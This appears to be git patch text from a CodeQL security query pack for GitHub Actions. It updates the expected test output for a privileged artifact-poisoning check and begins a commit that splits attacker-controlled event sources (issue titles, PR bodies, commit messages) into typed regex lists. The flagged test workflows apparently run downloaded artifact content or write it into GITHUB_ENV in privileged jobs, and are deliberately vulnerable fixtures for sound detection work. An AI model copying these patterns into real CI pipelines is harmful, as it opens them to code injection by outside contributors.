.github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning21.yml:18:9:20:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | semmle.label | ./foo/cmd\n | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning22.yml:17:9:18:19 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | semmle.label | ./cmd | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | semmle.label | ./bar/cmd\n | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | semmle.label | ./bar/cmd\n | | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | semmle.label | npm install\nnpm run lint\n | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | semmle.label | ./cmd | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected index ba635b1d74de..5bea5c7e52cf 100644 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected @@ -1,56 +1,56 @@ edges -| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:20 | Run Step | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:19 | Run Step | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | -| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | -| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | -| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | -| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning21.yml:18:9:20:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | semmle.label | ./foo/cmd\n | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning22.yml:17:9:18:19 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | semmle.label | ./cmd | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | semmle.label | ./bar/cmd\n | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | semmle.label | ./bar/cmd\n | | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | semmle.label | npm install\nnpm run lint\n | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | semmle.label | ./cmd | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | subpaths #select -| .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | Run Step | -| .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | Run Step | -| .github/workflows/artifactpoisoning21.yml:18:9:20:20 | Run Step | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:20 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:18:9:20:20 | Run Step | Run Step | -| .github/workflows/artifactpoisoning22.yml:17:9:18:19 | Run Step | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:19 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning22.yml:17:9:18:19 | Run Step | Run Step | -| .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | Run Step | -| .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | Run Step | -| .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | Run Step | -| .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | Run Step | -| .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | Run Step | -| .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | Run Step | -| .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | Run Step | -| .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | Run Step | -| .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | Run Step | +| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | ./x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | ./foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | ./cmd | +| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd | +| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | +| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | +| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | npm install\nnpm run lint\n | +| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | +| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | From 00f6ff8c0155c064c5e1733aaf3cc4710755185d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 27 Apr 2024 11:02:33 +0200 Subject: [PATCH 225/707] Split sources by taint type --- .../codeql/actions/dataflow/FlowSources.qll | 204 ++++-- .../actions/security/EnvVarInjectionQuery.qll | 8 - ...ahmadnassri_action-changed-files.model.yml | 4 +- ...nnn_action-semantic-pull-request.model.yml | 2 +- ql/lib/ext/cypress-io_github-action.model.yml | 2 +- ...dawidd6_action-download-artifact.model.yml | 2 +- ql/lib/ext/dorny_paths-filter.model.yml | 2 +- ...nzdiebold_github-env-vars-action.model.yml | 4 +- ...ecloudplatform_dataflowtemplates.model.yml | 2 +- .../puppeteer_puppeteer.model.yml | 2 +- .../ext/jitterbit_get-changed-files.model.yml | 14 +- ...han_pull-request-comment-trigger.model.yml | 4 +- ql/lib/ext/marocchino_on_artifact.model.yml | 2 +- ...bers-in-action_download-artifact.model.yml | 2 +- ql/lib/ext/tj-actions_branch-names.model.yml | 6 +- ql/lib/ext/tj-actions_changed-files.model.yml | 34 +- .../tj-actions_verify-changed-files.model.yml | 2 +- .../ext/trilom_file-changes-action.model.yml | 8 +- ql/lib/ext/tzkhan_pr-update-action.model.yml | 2 +- .../xt0rted_slash-command-action.model.yml | 4 +- ql/src/Security/CWE-077/EnvPathInjection.ql | 6 + ql/src/Security/CWE-077/EnvVarInjection.ql | 9 +- .../CWE-077/PrivilegedEnvPathInjection.ql | 6 + .../CWE-077/PrivilegedEnvVarInjection.ql | 9 +- ql/test/library-tests/test.actual | 598 ------------------ ql/test/library-tests/test.expected | 136 ++-- .../CWE-077/.github/workflows/test1.yml | 2 + .../CWE-077/.github/workflows/test4.yml | 4 + .../Security/CWE-077/EnvVarInjection.expected | 3 + .../PrivilegedEnvPathInjection.expected | 1 - .../PrivilegedEnvVarInjection.expected | 3 + 31 files changed, 313 insertions(+), 774 deletions(-) delete mode 100644 ql/test/library-tests/test.actual diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 0dc376765a8a..754d28cb93e6 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -1,5 +1,3 @@ -private import actions -private import codeql.actions.DataFlow private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery @@ -22,30 +20,56 @@ abstract class RemoteFlowSource extends SourceNode { } bindingset[context] -private predicate isExternalUserControlled(string context) { - exists(string reg | reg = "github\\.event" | +private predicate titleEvent(string context) { + exists(string reg | + reg = + [ + // title + "github\\.event\\.issue\\.title", // issue + "github\\.event\\.pull_request\\.title", // pull request + "github\\.event\\.discussion\\.title", // discussion + "github\\.event\\.pages\\[[0-9]+\\]\\.page_name", + "github\\.event\\.pages\\[[0-9]+\\]\\.title", + "github\\.event\\.workflow_run\\.display_title", // The event-specific title associated with the run or the run-name if set, or the value of run-name if it is set in the workflow. + ] + | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } bindingset[context] -private predicate isExternalUserControlledIssue(string context) { - exists(string reg | reg = ["github\\.event\\.issue\\.title", "github\\.event\\.issue\\.body"] | +private predicate urlEvent(string context) { + exists(string reg | + reg = + [ + // url + "github\\.event\\.pull_request\\.head\\.repo\\.homepage", + ] + | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } bindingset[context] -private predicate isExternalUserControlledPullRequest(string context) { +private predicate textEvent(string context) { exists(string reg | reg = [ - "github\\.event\\.pull_request\\.title", "github\\.event\\.pull_request\\.body", - "github\\.event\\.pull_request\\.head\\.label", - "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", - "github\\.event\\.pull_request\\.head\\.repo\\.description", - "github\\.event\\.pull_request\\.head\\.repo\\.homepage", - "github\\.event\\.pull_request\\.head\\.ref", "github\\.head_ref" + // text + "github\\.event\\.issue\\.body", // body + "github\\.event\\.pull_request\\.body", // body + "github\\.event\\.discussion\\.body", // body + "github\\.event\\.review\\.body", // body + "github\\.event\\.comment\\.body", // body + "github\\.event\\.commits\\[[0-9]+\\]\\.message", // messsage + "github\\.event\\.head_commit\\.message", // message + "github\\.event\\.workflow_run\\.head_commit\\.message", // message + 